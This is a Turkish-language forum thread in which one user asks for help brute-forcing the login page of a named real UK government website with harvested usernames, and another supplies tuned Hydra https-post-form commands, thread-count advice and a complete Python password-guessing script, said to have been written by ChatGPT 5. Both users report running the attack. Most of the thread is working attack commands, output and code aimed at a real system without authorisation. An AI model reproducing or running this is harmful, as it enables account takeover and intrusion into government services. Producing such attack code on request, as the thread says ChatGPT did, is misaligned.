Password Attack - Hydra/Medusa

Bam Bam · 8 Ağu 2025

Arkadaşlar Merhaba,

Yukarıda vermiş olduğum bağlantı bir login sayfası, elimde bu siteye ait kullanıcı adları var ( sıradan kullanıcı adları değil '7kHEpCOiP6' bu şekilde benzersiz )
Hydra ve Medusa ile denediğimde sürekli hata alıyorum, verdiği hatalar genelde bağlantıyı kabul etmiyor, http-post-form komutuna eklediğim uzantıyı kabul etmiyor vs.
Gerek 'burpsuite' gerek chrome yönetici araçları ile bağlantıyı kontrol ediyorum ve login eklentisini komuta giriyorum olmuyor, standart '/login:username=^USER^&password=^PASS^:F=incorrect' ' bunu giriyorum gene olmuyor , her iki uygulamada da benzer hatalar alıyorum.
Sizden ricam bana net komutu yazabilir misiniz ?

medusa -h www.points.homeoffice.gov.uk -U /home/kali/Masaüstü/USERNAMES.txt -P /home/kali/Masaüstü/Passlist.txt -M http -m '/gui-sms-jsf/home/SMS-003-Home.faces' -m '/login:username=^USER^&password=^PASS^:F=incorrect' -t 16 -n 443 -f

medusa -h www.points.homeoffice.gov.uk/gui-sms-jsf/home/SMS-003-Home.faces -U /home/kali/Masaüstü/USERNAMES.txt -P /home/kali/Masaüstü/Passlist.txt -M http -m '/login:username=^USER^&password=^PASS^:F=incorrect' -t 16 -n 443 -f

hydra -L /home/kali/Masaüstü/USERNAMES.txt -P /home/kali/Masaüstü/Passlist.txt www.points.homeoffice.gov.uk http-post-form '/gui-sms-jsf/home/SMS-003-Home.faces=j_username=asdas&j_password=asdas&login=Log+in'

Yukarıda denediğim bazı komut satırlarını ekledim.
Eğer yardımcı olabilecek olan varsa çok sevinim, yukarıda kontrol edebilmeniz için bağlantıyı verdim ( https://www.points.homeoffice.gov.uk ) host bu ama yanındaki (/gui-sms-jsf/home/SMS-003-Home.faces) eklendi olmadan malesef bir işe yaramıyor.
Şu uygulamaya şu komutu gir demeniz yeterli, şimdiden teşekkür ederim.
Not: Sadece 443 /tcp-http portu açık diğerlerinin hepsi kapalı bu yüzden komut girerken -n parametresi ile 443 e yönlendirdim.

Bam Bam · 8 Ağu 2025

Önerebileceğiniz başka tool da olur.

Neoax · 8 Ağu 2025

hydra -L /home/kali/Masaüstü/USERNAMES.txt -P /home/kali/Masaüstü/Passlist.txt www.points.homeoffice.gov.uk http-post-form "/gui-sms-jsf/home/j_security_check:j_username=^USER^&j_password=^PASS^&login=Log+in:Sorry, the details"

bu komutu dener misiniz

Bam Bam · 8 Ağu 2025

Neoax' Alıntı:
hydra -L /home/kali/Masaüstü/USERNAMES.txt -P /home/kali/Masaüstü/Passlist.txt www.points.homeoffice.gov.uk http-post-form "/gui-sms-jsf/home/j_security_check:j_username=^USER^&j_password=^PASS^&login=Log+in:Sorry, the details"

bu komutu dener misiniz

[DATA] max 16 tasks per 1 server, overall 16 tasks, 10385844868 login tries (l:502/p:20688934), ~649115305 tries per task
[DATA] attacking http-post-form://www.points.homeoffice.gov.uk:80/gui-sms-jsf/home/j_security_check:j_username=^USER^&j_password=^PASS^&login=Log+in:Sorry, the details
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
Hydra (GitHub - vanhauser-thc/thc-hydra: hydra) finished at 2025-08-08 22:04:50

Bu hatayı verdi.

Neoax · 8 Ağu 2025

saldırıyı engelleyen bir şey yok, sanırım ssl hatası veriyor. bu komutu da dener misiniz

Kod:

hydra -L /home/kali/Masaüstü/USERNAMES.txt -P /home/kali/Masaüstü/Passlist.txt www.points.homeoffice.gov.uk https-post-form "/gui-sms-jsf/home/j_security_check:j_username=^USER^&j_password=^PASS^&login=Log+in:Sorry, the details"

Bam Bam · 8 Ağu 2025

Neoax' Alıntı:
saldırıyı engelleyen bir şey yok, sanırım ssl hatası veriyor. bu komutu da dener misiniz

Kod:

hydra -L /home/kali/Masaüstü/USERNAMES.txt -P /home/kali/Masaüstü/Passlist.txt www.points.homeoffice.gov.uk https-post-form "/gui-sms-jsf/home/j_security_check:j_username=^USER^&j_password=^PASS^&login=Log+in:Sorry, the details"

Ekran Görüntüsü

Lightshot ile Yakalanmış

prnt.sc

Resimin solundaki ilk verdiğiniz komut ( yukarıda belirttiğim hatayı verdikten sonra birkaç saniye çalıştı ancak buldu olarak gözüken parolalar malesef doğru değil )
Resimin sağındaki de ikinci verdiğiniz komut, 3-4 dakikadır bekliyorum çalışmadı görseldeki gibi duruyor.
Ama post form doğru muhtemelen çünkü onunla ilgili bir hata vermiyor, sanki bir iki komut/parametre daha eklense herşey yoluna girecek gibi.

Neoax · 8 Ağu 2025

Bam Bam' Alıntı:
Ekran Görüntüsü

Lightshot ile Yakalanmış

prnt.sc

Resimin solundaki ilk verdiğiniz komut ( yukarıda belirttiğim hatayı verdikten sonra birkaç saniye çalıştı ancak buldu olarak gözüken parolalar malesef doğru değil )
Resimin sağındaki de ikinci verdiğiniz komut, 3-4 dakikadır bekliyorum çalışmadı görseldeki gibi duruyor.
Ama post form doğru muhtemelen çünkü onunla ilgili bir hata vermiyor, sanki bir iki komut/parametre daha eklense herşey yoluna girecek gibi.

yanlış parola girildiğinde "Sorry, the details you've entered don't match our records. User IDs and passwords are both case-sensitive; plus, if you're copying and pasting your user ID and/or password, please ensure that you don't include spaces at the end." hatasını veriyor. bunu programa F= parametresi ile belirttik zaten. bu hatayı görmezse ekrana bulduğu bilgileri yazdırır. isteseniz şöyle de kullanabilirsiniz.

Kod:

hydra -L /home/kali/Masaüstü/USERNAMES.txt -P /home/kali/Masaüstü/Passlist.txt www.points.homeoffice.gov.uk https-post-form "/gui-sms-jsf/home/j_security_check:j_username=^USER^&j_password=^PASS^&login=Log+in:Sorry, the details you've entered don't match our records. User IDs and passwords are both case-sensitive; plus, if you're copying and pasting your user ID and/or password, please ensure that you don't include spaces at the end."

belki hızlı olması için -t 64 parametresini kullanabilirsiniz. bunun haricinde bulana kadar beklemeniz gerekiyor ki bununda bir garantisi yok. parolaları bulamayabilir.

Bam Bam · 8 Ağu 2025

Neoax' Alıntı:
saldırıyı engelleyen bir şey yok, sanırım ssl hatası veriyor. bu komutu da dener misiniz

Kod:

hydra -L /home/kali/Masaüstü/USERNAMES.txt -P /home/kali/Masaüstü/Passlist.txt www.points.homeoffice.gov.uk https-post-form "/gui-sms-jsf/home/j_security_check:j_username=^USER^&j_password=^PASS^&login=Log+in:Sorry, the details"

buna -f -V komutu ekledim ve çalıştı yani ekranda hızlı bi şekilde username ve parolalar akıyor, bir kaç kez daha farklı komutla benzer şeyler yaşadım ama 'buldu' olarak verdiği parolar doğru değildi umarım bu sefer halollur, çok fazla kullanıcı ve parola var biraz uzun sürecek bekleyelim bakalım.
Çok teşekkür ederim yardımlarınız için.

Bam Bam · 8 Ağu 2025

Neoax' Alıntı:
yanlış parola girildiğinde "Sorry, the details you've entered don't match our records. User IDs and passwords are both case-sensitive; plus, if you're copying and pasting your user ID and/or password, please ensure that you don't include spaces at the end." hatasını veriyor. bunu programa F= parametresi ile belirttik zaten. bu hatayı görmezse ekrana bulduğu bilgileri yazdırır. isteseniz şöyle de kullanabilirsiniz.

Kod:

hydra -L /home/kali/Masaüstü/USERNAMES.txt -P /home/kali/Masaüstü/Passlist.txt www.points.homeoffice.gov.uk https-post-form "/gui-sms-jsf/home/j_security_check:j_username=^USER^&j_password=^PASS^&login=Log+in:Sorry, the details you've entered don't match our records. User IDs and passwords are both case-sensitive; plus, if you're copying and pasting your user ID and/or password, please ensure that you don't include spaces at the end."

belki hızlı olması için -t 64 parametresini kullanabilirsiniz. bunun haricinde bulana kadar beklemeniz gerekiyor ki bununda bir garantisi yok. parolaları bulamayabilir.

-t 64 eklemedim başladı artık iptal edip tekrar mı başlatayım yoksa o şekilde devam mı etsin.

Neoax · 8 Ağu 2025

Bam Bam' Alıntı:
-t 64 eklemedim başladı artık iptal edip tekrar mı başlatayım yoksa o şekilde devam mı etsin.

o sizin bileceğiniz iş hocam. ben eklerdim.

Bam Bam · 8 Ağu 2025

Neoax' Alıntı:
o sizin bileceğiniz iş hocam. ben eklerdim.

tamamdır çok teşekkür ederim destekleriniz için.

Bam Bam · 9 Ağu 2025

Belirli aralıklarla parola buldu 4-5 kez ama denediğimde yanlış parola hatası alıyorum kafayı yiyeceğim ya.

Screenshot

Neoax · 9 Ağu 2025

hydra'nın neden öyle hareketler sergilediğini anlamadım. chatgpt 5'e aşağıdaki kodu yazdırdım. onu deneyin isterseniz. resimlerde gördüğüm kullanıcı isimlerini ve rockyou.txt dosyasındaki parolaları kullanarak deneme yanılma saldırısını başlattım. 45 dakika geçti herhangi bir parola bulamadı henüz.

Python:

from multiprocessing.pool import ThreadPool
import requests
import re
from tqdm import tqdm
import threading

LOGIN_URL = "https://www.points.homeoffice.gov.uk/gui-sms-jsf/login/j_security_check"

HEADERS = {
    "User-Agent": ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
                   "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36")
}

ERROR_MSG = ("Sorry, the details you've entered don't match our records. User IDs and passwords are both case-sensitive; "
             "plus, if you're copying and pasting your user ID and/or password, please ensure that you don't include spaces at the end")

lock = threading.Lock()

def bruteflyer(session, username, password, success_file):
    with lock:
        print(f"Trying -> Username: {username} | Password: {password}")

    try:
        response = session.post(LOGIN_URL, headers=HEADERS, data={
            "j_username": username,
            "j_password": password,
            "login": "Log+in"
        }, timeout=10)

        if ERROR_MSG not in response.text:
            error = re.findall(r'<div class="errorRow">(.*?)</div>', response.text)

            with lock:
                print(f"[SUCCESS] Username: {username} | Password: {password} {error if error else ''}")
                with open(success_file, "a", encoding="utf-8") as f:
                    f.write(f"Username: {username} | Password: {password} | Error: {error if error else 'None'}\n")

            return True
        else:
            return False
    except requests.RequestException as e:
        with lock:
            print(f"[ERROR] Username: {username} | Password: {password} | Exception: {e}")
        return False

def main():
    username_file = input("Username list path: ").strip()
    password_file = input("Password list path: ").strip()
    success_file = input("Başarılı girişlerin kaydedileceği dosya adı (örnek: success.txt): ").strip()

    with open(username_file, "r", encoding="latin-1") as f:
        usernames = [u.strip() for u in f if u.strip()]

    with open(password_file, "r", encoding="latin-1") as f:
        passwords = [p.strip() for p in f if p.strip()]

    threads = input("Thread sayısı (default 30): ").strip()
    threads = int(threads) if threads.isdigit() else 30

    session = requests.Session()

    combos = [(session, u, p, success_file) for u in usernames for p in passwords]

    with ThreadPool(threads) as pool:
        list(tqdm(pool.starmap(bruteflyer, combos), total=len(combos)))

    print(f"\nTüm işlemler tamamlandı. Başarılı girişler '{success_file}' dosyasına kaydedildi.")

if __name__ == "__main__":
    main()

bu python kodunu .py uzantılı bir dosyaya kayıt edin ve python3 dosyaadi.py veya python dosyaadi.py şeklinde çalıştırın. gerekli bilgileri girdikten sonra deneme yanılma saldırısına başlayacaktır.

ModuleNotFoundError: no module named 'requests' şeklinde birr hata alırsanız pip3 install requests komutunu kullandıktan sonra tekrar çalıştırın.

Password Attack - Hydra/Medusa

Bam Bam

Yeni üye

Bam Bam

Yeni üye

Neoax

Katılımcı Üye

Bam Bam

Yeni üye

Neoax

Katılımcı Üye

Bam Bam

Yeni üye

Ekran Görüntüsü

Neoax

Katılımcı Üye

Ekran Görüntüsü

Bam Bam

Yeni üye

Bam Bam

Yeni üye

Neoax

Katılımcı Üye

Bam Bam

Yeni üye

Bam Bam

Yeni üye

Neoax

Katılımcı Üye

Sosyal medya sayfalarımız